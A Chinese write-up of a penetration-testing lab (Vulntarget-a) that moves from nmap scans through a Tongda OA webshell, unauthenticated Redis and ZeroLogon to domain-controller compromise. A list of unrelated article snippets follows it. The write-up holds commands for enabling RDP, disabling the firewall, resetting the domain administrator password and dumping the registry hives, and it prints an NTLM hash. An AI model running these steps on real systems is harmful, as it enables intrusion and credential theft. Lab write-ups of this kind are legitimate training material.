Vulntarget-a 打靶练习

        关于环境配置,这里就不在附上图片和说明了,网上一大堆,这里只针对自己练习,做一个记录。

外网信息收集

        利用arpscan工具,扫描了当前局域网中都存在哪些主机:

        正常来说我们不应该使用arpscan,而是像nmap这样的工具,毕竟在实战过程中,攻击机和目标机器并不在一个局域网中。那么下面是通过nmap扫描的结果:

        可以看到存在目标机器的IP地址为192.168.56.136,进行端口等信息的探测:

        当前靶机开放的端口存在四个,下面继续利用nmap进行端口服务、操作系统等信息的探测:

# nmap -sT -sC -sV -O -p135,80,139,445 192.168.56.136
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-28 21:01 CST
Nmap scan report for 192.168.56.136
Host is up (0.00030s latency).

PORT    STATE SERVICE      VERSION
80/tcp  open  http         nginx
|_http-title: \xCD\xA8\xB4\xEFOA\xCD\xF8\xC2\xE7\xD6\xC7\xC4\xDC\xB0\xEC\xB9\xAB\xCF\xB5\xCD\xB3
| http-robots.txt: 1 disallowed entry 
|_/
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
MAC Address: 00:0C:29:DA:FF:08 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: specialized|phone
Running: Microsoft Windows 7|Phone
OS CPE: cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows
OS details: Microsoft Windows Embedded Standard 7, Microsoft Windows Phone 7.5 or 8.0
Network Distance: 1 hop
Service Info: Host: WIN7-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   2:1:0: 
|_    Message signing enabled but not required
|_clock-skew: mean: -2h39m59s, deviation: 4h37m07s, median: 0s
|_nbstat: NetBIOS name: WIN7-PC, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:da:ff:08 (VMware)
| smb2-time: 
|   date: 2024-04-28T13:01:25
|_  start_date: 2024-04-28T12:36:11
| smb-os-discovery: 
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: win7-PC
|   NetBIOS computer name: WIN7-PC\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2024-04-28T21:01:24+08:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)

        看到上面的结果,80端口是nginx起的http服务,然后就是看到了RPC服务和SMB服务,当前的计算机的操作系统为windows 7 sp1 专业版;利用nmap的默认漏洞脚本进行初步的漏洞信息探测:

# nmap -sT --script=vuln -p80,139,135,445 192.168.56.136     
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-28 21:02 CST
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 192.168.56.136
Host is up (0.00057s latency).

PORT    STATE SERVICE
80/tcp  open  http
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.56.136
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://192.168.56.136:80/
|     Form id: center
|_    Form action: logincheck.php
| http-enum: 
|   /robots.txt: Robots file
|   /general/: Potentially interesting folder
|   /portal/: Potentially interesting folder
|_  /share/: Potentially interesting folder
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|       httponly flag not set
|   /general/: 
|     PHPSESSID: 
|       httponly flag not set
|   /portal/: 
|     PHPSESSID: 
|       httponly flag not set
|   /share/: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-dombased-xss: Couldn't find any DOM based XSS.
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 00:0C:29:DA:FF:08 (VMware)

Host script results:
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
|_smb-vuln-ms10-054: false

        看到初步的漏洞脚本探测结束之后,发现了80端口上存在robots文件,同时还有几个目录,同时看到了这个主机存在ms17-010漏洞,当然这是nmap给到的探测结果,具体还是需要去尝试。先看一下80端口上运行的是什么业务:

        发现是通达OA,由于我们的目标就是getshell,那么我们就找一下通达OA的nday,尝试先利用nday打一波:(这里直接利用OA工具探测了一下)

        可以看到探测出来的漏洞还是挺多的,先看看文件上传吧(这个漏洞是后台的漏洞,需要我们登录):

        这里尝试了几个弱口令,发现存在默认密码:账号为admin 密码为空 即可登陆成功!

        开始尝试后台getshell: 快捷菜单->个人文件柜->新建文件->然后上传附件:

        这里拼接的路径,我一直没有访问到,后来使用了网上的工具,注入了哥斯拉🐎;

        之后拿下了这个主机,并且权限还是比较高的,最高的系统权限。

        之后进行这台主机的信息收集,包括网络和杀软等等信息的收集。

 上线win7

        通过ipconfig /all命令,查看网络信息,发现了这台主机上还存在另外的一张网卡。就是10.0.20.0/24,查看杀软的信息:

         似乎并没有杀软。直接生成木马,上线cs:

        上传成功之后,执行上线:

        开启了防火墙:

        存在双网卡:

远程登录win7       

        需要建立隧道,进行内网的渗透了,但是在此之前,先dump一下密码等信息:

        发现了密码admin,username为win7;查看一下3389端口是不是开放:没有开放3389端口。使用命令开启:

reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /t REG_DWORD /v portnumber /d 3389 /f

wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1

netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f

netstat -ano | findstr "3389"

        开启远程桌面,还需要在防火墙上放行3389端口,之后查看端口信息,发现3389端口已经开启了:

        远程连接:

 隧道搭建

        上传了frp,进行隧道的搭建:

        之后还是上传了fscan,当然可以利用cs的插件等进行资产的探测:

        似乎fscan并没有发现网段中的其他存活主机信息,于是又换了其他的工具,使用插件进行探测:

        还是发现了一个主机是99(也可以查看一下arp的缓存表等信息,也会有所发现),探测端口信息:

        这里我就先去尝试了一下 99主机是不是存在web服务:

Redis 写webshell

        确实是存在web应用的!那么就可以在80端口上寻找一下突破点(此时的端口信息探测结束了):

        这里利用默认的端口,没有添加其他的端口,先看看,找不到突破点的话,在对常见的端口进行探测:

        似乎在80端口上并没有什么发现,于是再次进行了常见端口的扫描:发现了6379端口开放了!

        那就是存在redis服务,先看一下有没有redis的未授权访问:

        没问题,直接连接上来,存在未授权访问漏洞!

        由于前面还发现了80端口上存在web服务。因此可以尝试redis写入webshell,但是我们还需要知道绝对路径。由于之前的web服务上面,只有一个默认的界面,尝试了几个常见的路径贺文件,都是404;于是进行了目录扫描:

        发现了一个php文件,尝试进行访问:

        php探针,拿到了web目录的绝对路径!就可以尝试利用redis写入webshell了!

        尝试访问:

        执行成功了,发现蚁剑连接上来还是系统权限system:

上线CS

        查看是否存在杀软:

        发现存在windows defender!同时还发现存在防火墙状态开启:

        尝试给他关闭!

        新建一个TCP的Beacon

        生成木马,然后通过蚁剑上传,进行执行!

        执行完成之后,在CS上通过connect命令,连接内网主机:

        成功上线该主机:

 内网信息收集

        看到存在域:vulntarget.com  接下来去dump了一波密码信息,但是并没有发现明文的密码,只有NTLM等密文,尝试解密:

        看了一下,该主机的arp缓存信息,发现了:

        当前的主机,同样还是存在两个网卡,一个是10.0.10.0/24 一个是10.0.20.0/24 当前主机的内网的第二张网卡的IP地址是10.0.10.111,发现了内网中还存在一个主机10.0.10.110

        同样还使用了fscan,发现了域控主机就是10.0.10.110,是一台windows 2019

        包括利用其他的方法,也可以去判断和定位域控信息:

 Zerologon打域控

        尝试利用CVE-2020-1472-ZeroLogon打一波试试:先搭建隧道,这里直接使用CS的隧道来打:

        配置一下proxychains:

        正常能够访问到了已经!使用CVE-2020-1472-ZeroLogon将域控的密码重置为空:

        利用impactet,进行hash的dump:

Administrator:500:aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15:::

        然后利用hash,进行横向移动,利用wmiexec:

        然后可以修改administrator用户的密码:net user administrator !QAZ2wsx /domain

        之后关闭防火墙,开启远程3389端口:

netsh advfirewall set allprofiles state off		#关防火墙

#开3389
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

        利用代理远程连接:proxychains4 remmina

恢复域控的密码

        先保存注册表信息:

reg save HKLM\SYSTEM system.save
reg save HKLM\SAM sam.save
reg save HKLM\SECURITY security.save

        下载save文件到本地,进行解密:

lget sam.save
lget security.save
lget system.save

        本地读取:

        利用zerologon的exp,进行还原:

        再次尝试去dumphash:

        此时已经失败了,因为已经恢复了密码

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mfbz.cn/a/588953.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

各个硬件的工作原理

目录 前言 主存储器的基本组成 运算器的基本组成 控制器的基本组成 计算机的工作过程 前言 上个小节我们学习了现代计算机的基本构成都是基于冯诺依曼的思想来设计的,那么本章节要来看看主机内部三个组件的细节以及它们之间相互协调工作的. 主存储器的基本组成 这张图非常…

WPF基础应用

WPF参考原文 MVVM介绍 1.常用布局控件 1.1 布局控件 WPF&#xff08;Windows Presentation Foundation&#xff09;提供了多种布局容器来帮助开发者设计用户界面&#xff0c;以下是一些常用的布局&#xff1a; Grid: Grid是最常用的布局容器之一&#xff0c;它允许你通过定…

暗区突围端游海外版|暗区突围怎么玩 新手游玩攻略分享

游戏中健康系统与其它射击游戏有很大区别&#xff0c;根据受伤部位、伤势的不同&#xff0c;会有不同的表现。除了头部之外&#xff0c;其它部位如果损坏后继续受到伤害&#xff0c;那么伤害将会分摊到身体其它部位。在暗区内或者暗区外都可以对角色进行治疗&#xff0c;角色不…

Mybatis进阶(映射关系一对一 )

文章目录 1.基本介绍1.基本说明2.映射方式 2.配置xml方式&#xff08;多表联查&#xff09;1.数据库表设计2.新建子模块1.创建子模块2.创建基本结构 3.MyBatisUtils.java和jdbc.properties和mybatis-config.xml与原来的一致4.IdenCard.java5.Person.java6.IdenCardMapper.java7…

使用 uni-app 开发 iOS 应用的操作步骤

哈喽呀&#xff0c;大家好呀&#xff0c;淼淼又来和大家见面啦&#xff0c;上一期和大家一起探讨了使用uniapp开发iOS应用的优势及劣势之后有许多小伙伴想要尝试使用uniapp开发iOS应用&#xff0c;但是却不懂如何使用uniapp开发iOS应用&#xff0c;所以这一期淼淼就来给你们分享…

TCP三次握手,四次挥手

TCP三次握手 TCP协议 &#xff1a; 1。源端口 &#xff1a;当前的进程端口&#xff0c;2字节 2。目的端口&#xff1a;对方的端口 &#xff0c;2字节 3。序号&#xff1a;客户端或者服务器端生成的随机数 4.确认序号&#xff1a;确认上一次发送给数据对方有没有收到 5.标志…

三数之和细节

这道题看着简单&#xff0c;但是有细节要注意&#xff0c;不能有重复的三元组&#xff0c;我们也不能一开始的时候把重复的元素去除&#xff0c;如果全都是0的话&#xff0c;那么就删除的只剩下一个0了&#xff0c;显然答案是[0,0,0] class Solution { public:vector<vecto…

Jetpack Compose简介

文章目录 Jetpack Compose简介概述声明式UI和命令式UIJetpack Compose和Android View对比Compose API设计原则一切皆为函数组合优于继承单一数据源 Jetpack Compose和Android View关系使用ComposesetContent()源码ComposablePreview Jetpack Compose简介 概述 Jetpack Compos…

用龙梦迷你电脑福珑2.0做web服务器

用龙梦迷你电脑福珑2.0上做web服务器是可行的。已将一个网站源码放到该电脑&#xff0c;在局域网里可以访问网站网页。另外通过在同一局域网内的一台windows10电脑上安装花生壳软件&#xff0c;也可以在外网访问该内网服务器网站网页。该电脑的操作系统属于LAMP。在该电脑上安装…

【python】python标准化考试系统[单项选择题 简易版](源码)【独一无二】

&#x1f449;博__主&#x1f448;&#xff1a;米码收割机 &#x1f449;技__能&#x1f448;&#xff1a;C/Python语言 &#x1f449;公众号&#x1f448;&#xff1a;测试开发自动化【获取源码商业合作】 &#x1f449;荣__誉&#x1f448;&#xff1a;阿里云博客专家博主、5…

docker挂载数据卷-以nginx为例

目录 一、什么是数据卷 二、数据卷的作用 三、如何挂载数据卷 1、创建nginx容器挂载数据卷 2、查看数据卷 3、查看数据卷详情 4、尝试在宿主机修改数据卷 5、查看容器内对应的数据卷目录 6、 访问nginx查看效果 ​​​​​​​一、什么是数据卷 挂载数据卷本质上就是实…

基于springboot实现公司日常考勤系统项目【项目源码+论文说明】

基于springboot实现公司日常考勤系统演示 摘要 目前社会当中主要特征就是对于信息的传播比较快和信息内容的安全问题&#xff0c;原本进行办公的类型都耗费了很多的资源、传播的速度也是相对较慢、准确性不高等许多的不足。这个系统就是运用计算机软件来完成对于企业当中出勤率…

Unity3D初级实战项目之方块跑酷

目录 初始化项目开发环境初始化项目屏幕自适应 游戏UI界面元素布局开始界面UI角色选择&#xff08;商城&#xff09;界面UI游戏界面UI 地图生成算法之菱形布局Resources资源加载代码生成地图菱形布局 地图生成算法之墙壁边界菱形地图双排布局地图瓷砖颜色美化墙壁边界生成 地图…

git提交错了?别慌,直接删除提交记录

为什么要删除提交历史 前几天产品提了个很扯淡的需求&#xff0c;我在代码了进行了吐槽.... 要命的是我不下心进行了代码提交&#xff1a; 我们的远程仓库大家都能看见的 这要是被其他人发现就惨了&#xff01;当务之急&#xff0c;我必须立刻马上删除这一条提交记录&#xff…

菜鸡学习netty源码(一)——ServerBootStrap启动

1.概述 对于初学者而然,写一个netty本地进行测试的Server端和Client端,我们最先接触到的类就是ServerBootstrap和Bootstrap。这两个类都有一个公共的父类就是AbstractBootstrap. 那既然 ServerBootstrap和Bootstrap都有一个公共的分类,那就证明它们两个肯定有很多公共的职…

EMP.DLL是什么东西?游戏提示EMP.DLL文件缺失怎么解决

emp.dll文件是Windows操作系统中的一种动态链接库文件&#xff0c;它被设计为可以被多个程序共享使用的模块化文件。这种设计旨在提高系统效率&#xff0c;减少内存消耗&#xff0c;并简化软件的维护和更新。DLL文件通常包含了一系列相关的函数和变量&#xff0c;这些函数和变量…

全景剖析阿里云容器网络数据链路(七):Terway DataPath V2(Terway≥1.8.0)

作者&#xff1a;余凯 前言 近几年&#xff0c;企业基础设施云原生化的趋势越来越强烈&#xff0c;从最开始的IaaS化到现在的微服务化&#xff0c;客户的颗粒度精细化和可观测性的需求更加强烈。容器网络为了满足客户更高性能和更高的密度&#xff0c;也一直在高速的发展和演…

qt学习篇---界面按键关联(信号和槽)

目录 1.qt基础 2.做一个界面 创建project UI界面设计 信号和槽 1.控件改名字 2.什么是信号和槽 3.怎么关联信号和槽 自动关联 手动关联 1.qt基础 qt可移植性强&#xff0c;不久会用到MCU。很有意义学习 2.做一个界面 创建project 不要中文路径 选择QWidget .pro文件…

ASP.NET实验室预约系统的设计

摘 要 实验室预约系统的设计主要是基于B/S模型&#xff0c;在Windows系统下&#xff0c;运用ASP.NET平台和SQLServer2000数据库实现实验室预约功能。该设计主要实现了实验室的预约和管理功能。预约功能包括老师对实验室信息、实验项目和实验预约情况的查询以及对实验室的预约…

LeetCode 69—— x 的平方根

阅读目录 1. 题目2. 解题思路一3. 代码实现一4. 解题思路二5. 代码实现二 1. 题目 2. 解题思路一 二分查找法&#xff0c;对于整数 i ∈ [ 0 , x ] i \in [0,x] i∈[0,x]&#xff0c;我们判断 i 2 i^2 i2 和 x x x 的关系&#xff0c;然后找到最后一个平方小于等于 x x x …
最新文章